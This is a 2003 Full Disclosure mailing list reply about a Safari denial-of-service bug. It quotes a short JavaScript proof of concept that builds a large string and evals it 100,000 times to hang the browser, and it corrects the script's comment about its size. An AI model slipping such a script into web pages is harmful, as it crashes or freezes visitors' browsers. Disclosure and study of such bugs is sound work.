Full Disclosure mailing list archives

RE: safari dos


From: "Grant Husbands" <grant.husbands () businesswebsoftware com>
Date: Sun, 23 Nov 2003 12:07:46 -0000

I wrote:
b='';a="b=b+' ';"
for (var i=0;i<15;++i) a+=a;
// Above line creates a 64MB script
// Now run the 64MB script, 100,000 times
for (var i=0;i<100000;++i) eval(a);

Just a quick note; I had altered the script without updating
the comments. It only creates a 256KB script, now; a longer
one didn't seem necessary. Sorry.

Regards,
Grant.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: